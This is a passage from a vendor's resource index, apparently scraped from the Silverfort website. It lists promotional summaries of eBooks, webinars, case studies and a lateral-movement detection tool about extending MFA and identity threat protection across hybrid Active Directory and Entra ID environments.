Directory into Entra ID, automatically representing on-prem resources as SaaS-like enterprise app objects. Once bridged, Entra ID can apply centralized policies, monitor authentication activity, and protect access in real time—just like with any cloud-native app. With no code changes or user disruption, organizations get full visibility and unified control across their hybrid environments—while reducing the risk of identity-based attacks like lateral movement. In this PDF, you’ll learn how to: Bridge on-prem authentication flows into Entra ID, extending modern policy enforcement to legacy resources. Enforce Conditional Access and MFA on systems like command-line tools, servers, and databases. Gain consistent control and visibility across hybrid identity infrastructure—cloud and on-prem alike. Download the PDF to see how Silverfort makes Entra ID the policy engine for all your resources—not just the ones born in the cloud. --- - Published: 2023-09-26 - Modified: 2024-09-06 - URL: https://www.silverfort.com/resources/nhs-england-mfa-policy-compliance-with-silverfort/ NHS organisations and contractors are being encouraged to implement multi-factor authentication (MFA) controls for all privileged users and services accessing critical systems. UK NHS organisations are required to make every reasonable effort to comply as soon as possible. Learn how Silverfort can enable NHS organisations to deploy MFA protection to all user and resources across their environments.  Download this PDF to learn how to: Simply deploy MFA protection to all environments and resources in the Cloud or On-Prem without the need for agents or proxies. Identify and mitigate identity based attacks across your hybrid environment. Provide users with a consistent and familiar experience when accessing any resource, both on-prem and in the cloud. --- - Published: 2023-09-25 - Modified: 2024-10-22 - URL: https://www.silverfort.com/resources/osterman-research-silverfort-the-state-of-the-identity-attack-surface/ Today, organizations depend on digital assets for business, but identity threats pose a critical risk. Attackers persistently target user identities, revealing serious gaps in organizations’ protective tools. Silverfort commissioned an extensive study from Osterman Research to dig into the full extent of these security gaps, which are detailed in our new report, "The State of the Identity Attack Surface: Insights into Critical Protection Gaps. In this webinar, Silverfort CEO & Co-Founder, Hed Kovetz, joins Michael Sampson, Principal Analyst at Osterman Research for a detailed review of the key findings from this report and explores the various ways organizations remain dangerously exposed to attacks involving compromised credentials. Watch this webinar to discover: What the Identity Attack Surface is and why it must be protected The degree to which organizations have achieved multi-factor authentication (MFA), privileged access management (PAM), and service account protection Which solutions can fully protect the Identity Attack Surface And much more... --- - Published: 2023-09-20 - Modified: 2024-10-22 - URL: https://www.silverfort.com/resources/identity-zero-trust-from-vision-to-practical-implementation/ Since its emergence, zero-trust has been commonly associated with rebuilding networking infrastructure security. Silverfort challenges this approach and enables organizations to implement an end-to-end zero-trust architecture at the identity control plane by monitoring and enforcing active access policies on any user, system and environment, both on-premises and in the cloud. In this webinar, we present an actionable framework for identity zero-trust implementation and illustrate its effectiveness by analyzing prominent examples from the recent cybersecurity threat landscape. Gain insight into a number of different topics, including: The role of identity in zero-trust security The benefits of having unified IAM visibility and control for the implementation of zero-trust security The importance of risk analysis and adaptive policies in zero-trust security And more --- - Published: 2023-09-19 - Modified: 2025-07-21 - URL: https://www.silverfort.com/resources/silverfort-for-entra-id-sign-in-logs/ You already have the sign-in data. Silverfort helps you unlock its full security potential. This PDF details how Silverfort’s native integration with Microsoft Entra ID brings unified visibility, risk analysis, and proactive protection to every sign-in—across cloud, on-prem, and hybrid environments. By analyzing Entra ID sign-in logs alongside on-prem Active Directory data, Silverfort gives security teams a single, cohesive view of identity activity across the entire organization. Silverfort enriches every authentication event with real-time context, risk scoring, and threat indicators like lateral movement, Pass the Hash, and Kerberoasting. It doesn’t just centralize data—it turns it into an actionable layer of your identity security strategy. Whether you’re streamlining investigations or enforcing more precise access policies, this integration gives you the clarity and control you've been missing. In this PDF, you’ll learn how to: Correlate identity data from Entra ID and AD to detect hidden threats and anomalies in real time. Accelerate investigations with enriched forensic data on users, machines, apps, and protocols. Gain a consistent logging experience with full identity context—delivered in a single console. Download the PDF now to see how Silverfort transforms Entra ID sign-in data into a powerful force for enterprise security. --- - Published: 2023-09-19 - Modified: 2024-10-22 - URL: https://www.silverfort.com/resources/way-too-vulnerable-uncovering-the-state-of-the-identity-attack-surface-silverfort/ Organizations today rely on digital assets to conduct business, but identity threats have become a critical risk factor. As attackers relentlessly seek to compromise user identities for malicious access, it’s become increasingly apparent there are serious gaps in the tools organizations use to protect themselves. Silverfort commissioned an extensive study from Osterman Research, a leading cybersecurity consulting firm, which has revealed the full extent of these security gaps. In this webinar, our CEO & Co-Founder, Hed Kovetz, examines the state of the Identity Attack Surface and explores the various ways organizations remain dangerously exposed to attacks involving compromised credentials. Watch this webinar to explore: What the Identity Attack Surface is and why it must be protected The degree to which organizations have achieved multi-factor authentication (MFA), privileged access management (PAM), and service account protection Which solutions can fully protect the Identity Attack Surface And much more... --- - Published: 2023-09-06 - Modified: 2024-09-06 - URL: https://www.silverfort.com/resources/unified-identity-protection/ Watch this short video about Unified Identity Protection with Silverfort. Discover Unified Identity Protection with Hed Kovetz, CEO and Co-Founder at Silverfort. https://www. youtube. com/watch? v=Xuwip6mdB-Y --- - Published: 2023-09-06 - Modified: 2024-10-02 - URL: https://www.silverfort.com/resources/the-state-of-the-identity-attack-surface-an-osterman-research-report/ The first comprehensive study on identity threats resilience: why organizations are unable to protect themselves against account takeovers, lateral movement, and ransomware attacks. The first comprehensive study on identity threats resilience: why organizations are unable to protect themselves against account takeovers, lateral movement, and ransomware attacks. 83% of organizations have experienced a security breach involving compromised credentials. Only 5. 7% of organizations have full visibility into their service accounts. 89. 8% of organizations fail to fully onboard their PAM solutions. Only 22% of organizations are able to prevent malicious access to their service accounts. --- - Published: 2023-09-03 - Modified: 2024-09-06 - URL: https://www.silverfort.com/resources/solving-the-mfa-challenge-in-oil-gas-air-gapped-networks/ Oil and Gas companies struggle to maintain their air-gapped OT networks safe from identity threats such as lateral movement and ransomware attacks. This eBook explains: How third-party party access, IT\OT convergence, and use of Domain Controllers increases the air-gapped network exposure to malicious access Why traditional MFA and secure remote access solutions fail to deliver the required protection How Silverfort secures both the IT environment as well as the air-gapped networks with FIDO2 hardware token MFA --- - Published: 2023-08-31 - Modified: 2025-07-21 - URL: https://www.silverfort.com/resources/silverfort-mfa-for-air-gapped-networks/ Silverfort’s agentless authentication platform integrates directly with Okta to extend strong, adaptive multi-factor authentication (MFA) everywhere.... Air-gapped networks are designed for maximum security—but they’ve traditionally lacked one critical control: MFA. Silverfort changes that with the only MFA solution purpose-built for air-gapped environments, eliminating the need for code changes or internet connectivity. This solution brief introduces how Silverfort enables multi-factor authentication for all Active Directory authentications in fully disconnected networks without disrupting operations or compromising system integrity. What makes it different? No reboots, no updates: Ideal for 24/7 critical infrastructure with zero downtime tolerance Protect legacy systems without code changes: Apply MFA to any authentication flow—NTLM, Kerberos, LDAP—out of the box FIDO2 token support: Secure authentication using any hardware token, even in isolated environments The included diagram clearly illustrates how Silverfort integrates with AD to authenticate users, admins, non-human identities, and systems—without requiring any changes to the applications or their authentication mechanisms. If you operate OT, ICS, or highly secure air-gapped systems, this guide is your roadmap to adding robust identity protection—seamlessly. Get the PDF now to learn how you can secure your most critical, disconnected infrastructure with the simplicity and power of universal MFA. --- - Published: 2023-07-13 - Modified: 2025-02-22 - URL: https://www.silverfort.com/resources/maribyrnong-city-council-and-silverfort-a-case-study/ Real-Time Visibility into All Access-Related Activity As a prominent governmental entity, the city council of Maribyrnong needed to increase its overall security posture, which meant gaining better visibility into its admin users as well as its overall IT infrastructure. Since deploying Silverfort, the Maribyrnong City Council is protecting its key admin users and core resources, a capability that wasn’t possible before. In this case study you’ll learn: How Maribyrnong City Council implemented MFA protection for all users and resources in just four weeks How the city council of Maribyrnong gained complete visibility into the activity of all admins users How Maribyrnong City Council fully automated visibility and protection of service accounts Download Now --- - Published: 2023-07-06 - Modified: 2025-05-22 - URL: https://www.silverfort.com/resources/optix-and-silverfort-a-case-study/ Renewed Cyber Insurance Policy and Prevented an Lateral Movement Attack Optix’s cyber insurance provider tightened their requirements for Optix to renew their cyber insurance policy. Optix needed to deploy Multi-Factor Authentication (MFA) on all domain admin access requests. Once Optix implemented Silverfort across its environments, they were able to renew their cyber insurance policy shortly after. Two months after deploying Silverfort, Optix was targeted by a malicious actor who was trying to move laterally across their network. This attack was unsuccessful due to Silverfort enabling Optix to identify the root cause and immediately blocked all access for the user whose credentials had been compromised. In this case study you’ll learn: How Silverfort enabled Optix to meet their new cyber insurance requirements for MFA protection How Optix gained complete visibility into their service accounts How Silverfort’s service accounts capabilities detected and prevented an lateral movement attack --- - Published: 2023-06-15 - Modified: 2025-07-21 - URL: https://www.silverfort.com/resources/identity-zero-trust-how-to-move-from-vision-to-implementation-ebook/ Learn why it makes sense to begin with an identity focus when it comes to Zero Trust and how Silverfort can help take your Zero Trust security project from vision to implementation. Zero Trust in the identity control plane means the ability to ensure that user access to any on-prem or cloud resource is never granted unless it’s been analyzed and verified. However, while the vision is clear and intuitive, many organizations struggle with its implementation in practice. Download this eBook to learn: Why the identity control plane is the natural place to begin your Zero Trust journey. What the four pillars are that can assist you in implementing identity Zero Trust in your environment. What makes Silverfort your ideal identity Zero Trust partner with continuous monitoring, risk analysis, and access policy enforcement on all users and resources. --- - Published: 2023-06-14 - Modified: 2024-09-06 - URL: https://www.silverfort.com/resources/cyber-essentials-and-cyber-essentials-plus-certification-assessment/ This whitepaper specifies how organisations can integrate the Silverfort Unified Identity Protection platform to help comply with the Cyber Essentials and Cyber Essentials Plus certification assessment per its latest update in April 2021. Download this whitepaper to learn: What is the Cyber Essentials and Cyber Essentials Plus certification assessment? What parts of the Cyber Essentials and Cyber Essentials Plus does Silverfort address? What protection do mitigations provide? --- - Published: 2023-06-06 - Modified: 2025-07-21 - URL: https://www.silverfort.com/resources/identity-threat-detection-and-response-itdr-protecting-the-exposed-attack-surface/ Learn how Silverfort’s Azure AD bridging capability extends Azure AD MFA and Conditional Access to all on-prem resources while configuring all access policies from Azure AD. Identity threats that utilize compromised credentials to for malicious access to targeted resource have become the chief concern for organizations’ security stakeholders. Neither one of the existing security products can deliver real-time protection against these attacks, making them account takeover, lateral movement and ransomware spread a critical, unaddressed risk. Identity Threat Detection and Response (ITDR) is the new category of products that was purpose built to confront and win against these attacks.  Download this eBook to learn: What makes the identity attack surface exposed to attacks? What are the core capabilities of ITDR solution? How to choose an ITDR solution that best fits your needs? --- - Published: 2023-06-06 - Modified: 2024-11-04 - URL: https://www.silverfort.com/resources/solving-the-top-five-pam-challenges-of-identity-teams/ Learn how Silverfort’s Azure AD bridging capability extends Azure AD MFA and Conditional Access to all on-prem resources while configuring all access policies from Azure AD. PAM solutions aim to address the challenge of protecting privileged accounts – both admin users and service accounts – from compromise. However, there are critical admin user discovery and protection challenges that must be overcome to successfully complete the PAM onboarding journey.  Download this eBook to learn: Why only protecting the admins you know about leaves critical users exposed to compromise. What special visibility and protection challenges service accounts introduce to PAM solutions. How a Unified Identity Security platform can accelerate the PAM journey and complement its blind spots. --- - Published: 2023-05-23 - Modified: 2025-08-21 - URL: https://www.silverfort.com/resources/bridging-legacy-resources-from-ad-to-azure-ad-ebook/ Learn how Silverfort’s Azure AD bridging capability extends Azure AD MFA and Conditional Access to all on-prem resources while configuring all access policies from Azure AD. Modern enterprise IT environments are highly diverse and include many different resources, from legacy IT infrastructure to SaaS and web applications. This has required enterprises to deploy multiple IAM solutions such as Entra ID to manage their on-prem and cloud environments. While Entra ID protects cloud, SaaS, and web apps with Conditional Access and Entra ID MFA, on-prem enterprise resources authentication protocols do not natively support Entra ID. This creates a critical identity protection gap that has not been addressed – until today.  Download this eBook to learn: What are the security gaps in hybrid environments? How Silverfort enables organizations to overcome the hybrid environment security gaps How Silverfort’s Entra ID bridging extends Entra ID MFA and Conditional Access to all on-prem resources while configuring all access policies from Azure AD. --- - Published: 2023-05-23 - Modified: 2024-10-22 - URL: https://www.silverfort.com/resources/real-time-mfa-and-service-account-protection-can-defeat-ransomware-attacks/ Lateral movement is the X factor that transforms ransomware attacks from a mere nuisance to an enterprise-level incident. While once found only in high-end APT style operations, today lateral movement skills and techniques have been commoditized and are incorporated into over 80% of ransomware attacks. Why are these attacks still succeeding at large despite increasing investments in cybersecurity controls? The answer lies in the inherent blind spots found in practically every security stack, and the inability of endpoint and network security products to prevent malicious authentications in real time. In this webinar, Silverfort’s VP of Product Marketing, Yiftach Keshet, joins CISO, James Azar, for a discussion around topics, including: How lateral movement has gradually become the most critical risk your environment faces. How the blind spots in MFA and service account protection allow attackers to move in our environments under the radar. What makes identity-focused protection the only way to defeat lateral movement and ransomware spread? And more --- - Published: 2023-05-22 - Modified: 2024-09-06 - URL: https://www.silverfort.com/resources/silverfort-for-microsoft-365-e5/ Silverfort’s agentless authentication platform integrates directly with Okta to extend strong, adaptive multi-factor authentication (MFA) everywhere.... Whether already fully deployed with multiple Microsoft 365 E5 security products or just starting, Silverfort provides unified identity protection across on-prem, cloud, and edge environments. By extending and enhancing your investment in Microsoft 365 E5 to resources and interfaces that couldn’t be protected before such as legacy applications, on-prem servers, and more.  Download this PDF to learn how: Silverfort helps organizations to consolidate their IAM and extend identity protection across hybrid environments Silverfort Empowers Microsoft 365 E5 Products Silverfort and Microsoft have joined forces to deliver unmatched real-time detection and prevention of identity threats in a unified manner --- - Published: 2023-05-10 - Modified: 2025-02-22 - URL: https://www.silverfort.com/resources/starco-and-silverfort-a-case-study/ Extending MFA Protection to All Users and Resources Understanding the security risks of identity-based attack methods that are commonly used when targeting admin users and RDP access, STARCO recognized they needed an identity protection solution that would be the answer to their identity security needs. With Silverfort, they deployed MFA protection for admin users and RDP, and along the way, they implemented Silverfort’s service account discovery and protection capabilities across their environments. In this case study you’ll learn: How MFA protection was deployed across all users and resources in just a few hours How All admin and privileged users of STARCO are protected with MFA policies How STARCO fully automated visibility and protection of service accounts --- - Published: 2023-05-07 - Modified: 2024-09-26 - URL: https://www.silverfort.com/resources/reevaluate-your-mfa-protection-ebook-ug/ Silverfort’s agentless authentication platform integrates directly with Okta to extend strong, adaptive multi-factor authentication (MFA) everywhere.... MFA protection is ultimately only as strong as its weakest link. Without an MFA deployment that covers all organizational resources, these weak links will persist, potentially exposing your organization to risk.  Download this eBook to learn: What are the security gaps in traditional MFA solutions? How can you assess your existing MFA protection to better understand your risk exposure? How can you gain end-to-end MFA coverage for all your cloud and on-prem resources? --- - Published: 2023-04-13 - Modified: 2025-02-22 - URL: https://www.silverfort.com/resources/major-multinational-bank-extends-custom-mfa-to-legacy-applications/ Extending MFA Protection to Legacy Applications This case study examines an important issue faced by many financial institutions: How to protect crucial legacy applications with modern security controls without undertaking any code changes or incurring any downtime. With Silverfort, a major multinational bank was able to seamlessly extend its custom MFA solution to hundreds of legacy apps. In this case study you’ll learn: How legacy apps can be protected with MFA without code changes How this same protection can be extended to additional parts of the IT and security infrastructure How an MFA policy can be created to allow access to a suite of apps with just a single verification --- - Published: 2023-03-30 - Modified: 2025-04-10 - URL: https://www.silverfort.com/resources/silverfort-service-accounts-solution-brief/ Silverfort automates the discovery, access control and protection of all service accounts in the environment, providing organizations with granular visibility into every non-human identity and machine-to-machine authentication.  Download this Solution Brief to learn: How Silverfort discovers all of your service accounts. How Silverfort continuously monitors your service accounts’ access activity and provides a risk scoring for each access attempt. How Silverfort automatically suggests a tailor-made policy for each service account based on its behavioral pattern. --- - Published: 2023-03-30 - Modified: 2024-09-06 - URL: https://www.silverfort.com/resources/securing-manufacturing-environments-with-mfa/ In this e-book you’ll learn the core components of lateral movement attacks and understand why they are a blind spot for today’s endpoint, network, and PAM products. Manufacturers are continuously targeted by cyber-attacks that increase in volume and sophistication with the potential result of a harsh impact on their operations. Specifically, the steep rise in identity threats that utilize compromised credentials for malicious resource access has become a top concern for manufacturers’ security teams that strive to keep their applications and systems secure. Download this eBook to learn: What are the different key identity protection challenges manufacturers experience. About the importance of protecting manufacturing environments with MFA. How you can gain end-to-end MFA coverage across your entire production environments. --- - Published: 2023-03-29 - Modified: 2025-07-21 - URL: https://www.silverfort.com/resources/solving-the-lateral-movement-protection-blind-spot-with-identity-threat-detection-and-response-itdr/ In this e-book you’ll learn the core components of lateral movement attacks and understand why they are a blind spot for today’s endpoint, network, and PAM products. Lateral movement is one of the most critical parts of a cyberattack, and is often the stage in which a local event escalates into an organizational incident. Yet so far, the existing products within the identity and security stacks have failed to efficiently protect against this type of malicious activity. Download this eBook to learn: How lateral movement employs compromised credentials to spread in a targeted network. What are the inherent blind spots that enable adversaries to launch lateral movement attacks without encountering adequate resistance. How the emerging Identity Threat Detection and Response (ITDR) approach mitigates lateral movement attacks by preventing them in real time. --- - Published: 2023-02-27 - Modified: 2024-10-22 - URL: https://www.silverfort.com/resources/understanding-cyber-insurance-identity-security-requirements-for-2023/ The practice of cyber insurance has gained momentum during the last decade and is now a common necessity for organizations of all sizes and verticals. However, the recent surge in ransomware attacks - and the steep rise in their destructive impact - has made insurance underwriters realize that a radical change in the standard security posture is needed, particularly around MFA requirements and service account protection. In this webinar, we take a deep dive into the identity protection aspects of the new cyber insurance requirements. Hear from expert Don Hoffman of Silverfort about topics, including: What types of MFA are required for cyber liability insurance? How do new specific MFA controls minimize ransomware attack surfaces? How can you extend MFA and other modern access controls to all resources, including service accounts and others that couldn’t have been protected before? And more --- - Published: 2023-02-26 - Modified: 2025-07-21 - URL: https://www.silverfort.com/resources/silverfort-microsoft-extending-azure-mfa-to-all-resources-that-couldnt-be-protected-before/ Think Entra MFA stops at the cloud? Silverfort proves it doesn’t have to. This solution brief reveals how Silverfort supercharges Microsoft’s Entra MFA, extending its protection to every resource across your organization—without code changes, agents, or disruptions. That includes legacy applications, RDP and SSH, command-line tools like PowerShell and PsExec, file shares, databases, and more. With native integration into Active Directory, Silverfort can enforce Entra MFA even for systems that never supported it. The result? You get real-time protection from identity-based threats—everywhere—and your users only get prompted when there’s real risk. No more MFA fatigue. No more unprotected access points. This guide breaks down how it works, what makes it powerful, and why it’s the easiest way to standardize on Entra MFA across your hybrid environment. In this PDF, you’ll learn how to: Apply Entra MFA to all resources, including legacy and on-prem systems that couldn’t be protected before. Use risk-based enforcement so users only get prompted when unusual behavior is detected. Deploy seamlessly with Silverfort’s agentless, proxyless architecture—no changes to apps or infrastructure. Download the solution brief now and see how Silverfort turns Entra MFA into a truly unified, enterprise-wide security layer. --- - Published: 2023-02-26 - Modified: 2025-07-21 - URL: https://www.silverfort.com/resources/silverfort-and-microsoft-ad-fs-integration/ Think AD FS can’t protect your legacy systems or on-prem servers with MFA? Think again. This PDF shows how Silverfort enhances Microsoft AD FS with powerful risk-based MFA enforcement—without modifying your applications or infrastructure. Through native integration with Active Directory, Silverfort evaluates every access request in real time and pushes Azure MFA notifications only when true risk is detected. The result? Organizations can now apply MFA across their entire environment—from legacy tools and databases to SSH, RDP, command-line access, and cloud workloads—while avoiding user fatigue and deployment headaches. Whether you’re aiming to modernize identity protection or close the gap in your zero trust strategy, this guide is a must-read. In this PDF, you’ll learn how to: Apply Azure MFA protection via AD FS to resources that don’t natively support it, like legacy apps and IT infrastructure. Leverage advanced risk analysis to ensure MFA prompts only appear when truly needed. Gain unified, real-time identity protection across cloud and on-prem system, without rewriting or reconfiguring apps. Download the PDF now to learn how Silverfort turns AD FS into a full-spectrum identity security powerhouse. --- - Published: 2023-02-01 - Modified: 2024-09-06 - URL: https://www.silverfort.com/resources/top-identity-protection-challenges-for-manufacturing-organizations/ Silverfort’s agentless authentication platform integrates directly with Okta to extend strong, adaptive multi-factor authentication (MFA) everywhere.... It is common knowledge that manufacturing is one of the most targeted verticals and that threat actors launch data theft and ransomware operations on manufacturing companies daily. What is less commonly known is that the rise of identity threats’ part within the overall threat landscape collides with security weaknesses that are unique to this vertical, increasing manufacturers’ risk exposure and the potential damage these attacks can cause. In this collateral, you’ll become familiar with the identity threats that manufacturing environments face, get to know the top challenges they face when attempting to protect against them, and learn how Silverfort’s Unified Identity Protection platform can assist identity and security teams to fully address these challenges and maintain their environments secure. --- - Published: 2023-02-01 - Modified: 2024-09-06 - URL: https://www.silverfort.com/resources/silverfort-mfa-protect-the-unprotectable/ Silverfort’s agentless authentication platform integrates directly with Okta to extend strong, adaptive multi-factor authentication (MFA) everywhere.... Silverfort utilizes agentless and proxyless technology to extend MFA to any resource and access interface across the on-prem and multi-cloud enterprise environment.  This includes assets that could never have been protected with MFA before, such as legacy and homegrown applications, command-line access tools, industrial and healthcare systems, file shares, databases and more.  Download this Solution Brief to learn: How to apply MFA protection to all resources, on-premises or in the cloud, including those that couldn’t be protected until now. How to extend your existing MFA solution to cover resources and use cases that weren’t natively supported. How Silverfort can replace any MFA solution, delivering broader protection, simpler maintenance and significant savings while addressing MFA, PAM and UEBA. --- - Published: 2023-01-25 - Modified: 2024-09-06 - URL: https://www.silverfort.com/resources/bounce-the-ticket-and-silver-iodide-on-azure-ad-kerberos/ Silverfort’s agentless authentication platform integrates directly with Okta to extend strong, adaptive multi-factor authentication (MFA) everywhere.... Azure AD Kerberos is a new modification of the legacy Kerberos protocol, and was developed by Microsoft to enable IaaS workloads in Azure to authenticate directly to Azure AD instead to a legacy AD as they did until now. However, our research disclosed that some of the critical Kerberos weaknesses are still present in the new Entra ID (formerly Azure AD). In this research you can learn how we have modified the Kerberos Pass the Ticket and Silver Ticket techniques to develop the new Bounce the Ticket and Silver Iodide that can be used against Azure AD Kerberos. --- - Published: 2023-01-04 - Modified: 2025-02-22 - URL: https://www.silverfort.com/resources/lateral-movement-prevention-with-mfa-and-service-account-protection/ Silverfort’s agentless authentication platform integrates directly with Okta to extend strong, adaptive multi-factor authentication (MFA) everywhere.... Lateral movement and ransomware propagation abuse two key blind spots in Active Directory to take down organizations' data and operations: service accounts and MFA. Silverfort's Unified Identity Security platform rises up to this challenge, providing its customer with real-time detection and blocking of lateral movement attacks, with its extended MFA and automated service account protection. In this case study you’ll learn: How a Silverfort customer's AD environment was subject to a lateral movement attack that involved the compromise of two admins and a service account. How the MFA and service account protection policies were able to block this attack as it started, preventing severe damage. How the customer has used Silverfort to conduct rapid and efficient response and remediation process --- - Published: 2023-01-04 - Modified: 2024-10-03 - URL: https://www.silverfort.com/resources/accelerate-your-privileged-access-management-pam-journey/ Silverfort’s agentless authentication platform integrates directly with Okta to extend strong, adaptive multi-factor authentication (MFA) everywhere.... Privileged Access Management (PAM) products are the go-to solution for many organizations that seek to secure their administrative accounts against credential compromise. This need applies equally to both human admins as well as Active Directory service accounts. However, PAM deployment and onboarding process can become a years-long process, creating a continuous security gap  Download this Solution Brief to learn: How Silverfort’s automated service accounts discovery radically shortens PAM onboarding time. How Silverfort protected the PAM itself from being compromised. How Silverfort provides real-time protection to all the privileged accounts that you choose to leave outside of the PAM’s vault. --- - Published: 2023-01-03 - Modified: 2024-09-06 - URL: https://www.silverfort.com/resources/silverfort-microsoft-azure-ad-extending-azure-mfa-to-unprotected-systems/ Silverfort’s agentless authentication platform integrates directly with Okta to extend strong, adaptive multi-factor authentication (MFA) everywhere.... Silverfort offers a native integration with Entra ID (formerly Azure AD) that extends Entra ID (formerly Azure AD) security controls to all resources within the hybrid environment — whether they’re on-prem or in the cloud.  Download this PDF to learn how to: Extend Azure MFA to on-prem legacy applications, command line access to workstations and servers, and other resources that couldn’t be protected with MFA before. Identify and mitigate identity-based attacks across your on-prem and multi-cloud environment. Provide users with a consistent and familiar experience when accessing any resource, both on-prem and in the cloud. --- - Published: 2022-12-28 - Modified: 2024-09-06 - URL: https://www.silverfort.com/resources/extending-azure-ad-mfa-and-conditional-access-to-on-prem-resources/ Silverfort’s agentless authentication platform integrates directly with Okta to extend strong, adaptive multi-factor authentication (MFA) everywhere.... The strategic integration of Silverfort and Azure AD enables organizations to extend Azure AD security controls to all resources within the hybrid environment — whether they’re on-prem or in the cloud.  Download this PDF to learn how to: Extend Azure AD and MFA to any asset, including legacy apps, IT infrastructure, and command-line tools. Identify and mitigate identity-based attacks across your on-prem and multi-cloud environment. Provide users with a consistent and familiar experience when accessing any resource, both on-prem and in the cloud. --- - Published: 2022-12-27 - Modified: 2025-04-14 - URL: https://www.silverfort.com/resources/silverfort-microsoft-365-defender-unified-xdr-identity-threat-protection/ Today’s data breaches and ransomware attacks often include two key components – exploiting the endpoint and using compromised credentials to move laterally to additional resources. Silverfort and Microsoft have joined forces to deliver unmatched real-time detection and prevention of identity threats in a unified manner, across all resources and environments.  Download this PDF to learn how to: Extend Azure MFA to on-prem legacy applications, command line access to workstations and servers, and other resources that couldn’t be protected with MFA before. Prevent compromised users from accessing resources, while allowing legitimate users to prove their identity and avoid interruption. Enforce granular authentication and access policies for any access to corporate resources, based on the user’s risk. --- - Published: 2022-11-30 - Modified: 2025-07-21 - URL: https://www.silverfort.com/resources/silverfort-duo-extending-mfa-to-corporate-resources-that-couldnt-be-protected-before/ This solution brief explores how Silverfort’s native integration with Duo extends MFA protection to previously unprotectable parts of your infrastructure, like legacy applications, command-line tools, internal admin access, and more. By acting as a control point across both cloud and on-prem environments, Silverfort evaluates every access request in real time. When risk is detected, it triggers Duo to prompt MFA—no changes, no delays. This means you get enterprise-wide identity protection with less overhead and a smoother user experience. It’s MFA for every user, every session, and every resource—without the fatigue, friction, or complexity. In this PDF, you’ll learn how to: Extend Duo MFA everywhere—including legacy systems, file shares, and command-line tools. Enforce risk-based access so MFA is only triggered when suspicious behavior is detected. Deploy fast and friction-free using Silverfort’s unique architecture. Download the PDF and discover how Silverfort and Duo help you stop identity threats at every access point—no matter how old, hidden, or hybrid. --- - Published: 2022-11-23 - Modified: 2025-07-21 - URL: https://www.silverfort.com/resources/silverfort-rsa-extends-mfa-protection-to-all-resources-in-the-cloud-and-on-prem/ RSA SecurID is powerful—but what if it could also protect legacy apps, scripts, and servers that were never designed for MFA? That’s exactly what Silverfort delivers. This PDF explores how the Silverfort + RSA integration lets you extend RSA’s proven MFA to all access points in your environment—on-prem or in the cloud. From PowerShell and PsExec to RDP, file shares, and internal admin tools, no system is left behind. Silverfort evaluates every authentication request in real time, determines whether MFA is warranted, and triggers RSA SecurID when needed. The result? Full-spectrum protection, without rewriting a single line of code or deploying agents. Whether you’re modernizing identity security or closing Zero Trust gaps, this guide will show you how to get more out of your RSA investment. In this PDF, you’ll learn how to: Apply RSA MFA everywhere, even on legacy systems and command-line tools. Use adaptive MFA based on real-time risk signals—so users are only prompted when it matters. Deploy seamlessly with unique architecture for rapid coverage. Download the PDF now and discover how Silverfort makes RSA SecurID stronger, smarter, and enterprise-wide. --- - Published: 2022-09-21 - Modified: 2024-10-22 - URL: https://www.silverfort.com/resources/the-critical-role-of-identity-in-zero-trust-security/ The Zero Trust approach to cyber security was formulated to defend all users and applications from Internet and identity-based attacks. It also relies on multiple components to deliver maximum protection, including identity management, access control, threat detection and response, multi-factor authentication and threat intelligence as well as ongoing monitoring and analysis. Managing and configuring all of those separate tools across different on-prem and cloud hosted systems and environments can be complex and time consuming for IT departments though, so what’s the best way to apply suitable policies both at the perimeter and inside the network to minimize the risk of being breached? To help answer the question, check out this webinar where we will: Define the Zero Trust approach to cyber security and consider how it can deliver better protection than perimeter solutions, with reference to recent examples of successful cyber attacks which evaded existing defenses. Analyze the role that identity management plays in that Zero Trust Architecture and discuss the importance of giving IT departments sufficient visibility and control over the policies and frameworks they put in place. Provide a detailed breakdown of how Silverfort’s unified identity protection platform builds an end to end Zero Trust architecture which monitors and enforces access policies for any user and system spanning both on-prem and cloud environments. Outline a real world implementation of Silverfort’s platform by a customer from start to finish, detailing the additional cyber security protection it provided them. --- - Published: 2022-09-20 - Modified: 2025-02-22 - URL: https://www.silverfort.com/resources/leading-manufacturer-averted-lateral-movement/ Identity Protection: A Top Priority This case study discusses a supply chain cyber incident where a leading manufacturer was attacked by nation-state actors who were attempting to move laterally from a compromised factory network to the manufacturer’s domain environment via laptops that were maliciously accessed while several of the company’s employees were visiting the factory. Fortunately, the manufacturer’s security team was able to thwart the attack by using Silverfort’s capabilities to prevent, detect, and respond to identity threats that use compromised credentials to access targeted resources. In this case study you’ll learn about: Typical supply chain risks in the interconnected cyber space A new lateral movement flavor that traverses between different organizations Mitigating the risk of NTLM authentications with Silverfort policies Utilizing Silverfort’s logs for early threat detection --- - Published: 2022-09-08 - Modified: 2024-09-06 - URL: https://www.silverfort.com/resources/lateral-movement-analyzer-tool-beta/ Domain Controllers are the nerve system of your enterprise. Silverfort's vulnerability assessment tool enables you to discover all DCs in your domain and tell whether they have vulnerabilities that expose them to identity-based attacks. Description The Lateral Movement Analyzer tool (beta) enables security teams to hunt for active lateral movement in their environments. The tool analyzes AD traffic offline and provides actionable output on the accounts suspected to have been compromised and the machines these accounts have accessed. Routine use of this tool can significantly assist in detecting lateral movement in its earliest stages and taking the actions required to remove malicious entities from the environment. Details The tool includes two modules: Collector, which gathers authentication logs from the environment, and Analyzer, which analyzes these logs to detect authentication anomalies associated with lateral movement patterns. Collector The Event Log Collector module gathers authentication logs in the following manner: NTLM authentications: scanning Domain Controllers for Windows event 8004. Kerberos authentication: scanning client machines for Windows event 4648. Requirements: Domain admin privileges. LDAP/S and RPC access to the DC and client. Windows machine with Python 3. 8 or above. Output: CSV file with the following fields: source host, destination, username, auth type, SPN and timestamps in the format %Y/%M/%D %H:%M Analyzer The Analyzer operates on the data the Collector provides, searching for lateral movement patterns based on the following methods: Lateral Movement Analyzer (LATMA) algorithm: enhancement of the Hopper algorithm to detect anomalous user authentications. Lateral movement IoCs: with the anomalous authentications LATMA provides, the analyzer searches for authentication sequences and patterns that indicate an active lateral movement is taking place. Requirements: The analyzer can be executed from both Windows and Linux machines. Output: Text file containing a list of compromised user accounts and machines, and line by line description of the suspected attack. GIF file with full visualization of the suspected attack flow. The beta version is available for download below. --- - Published: 2022-08-09 - Modified: 2025-02-22 - URL: https://www.silverfort.com/resources/agilisys-and-silverfort-case-study/ Extending MFA Protection Across All Environments: Agilisys was looking to ensure sufficient MFA protection for all its environments and interfaces, including those that could not previously have been protected. With Silverfort, they secured all their on-prem resources and legacy apps within a month. In this case study you’ll learn: How privileged accounts were secured How all Active Directory resources were protected How MFA was applied to command-line access interfaces such as PowerShell --- - Published: 2022-07-31 - Modified: 2025-04-28 - URL: 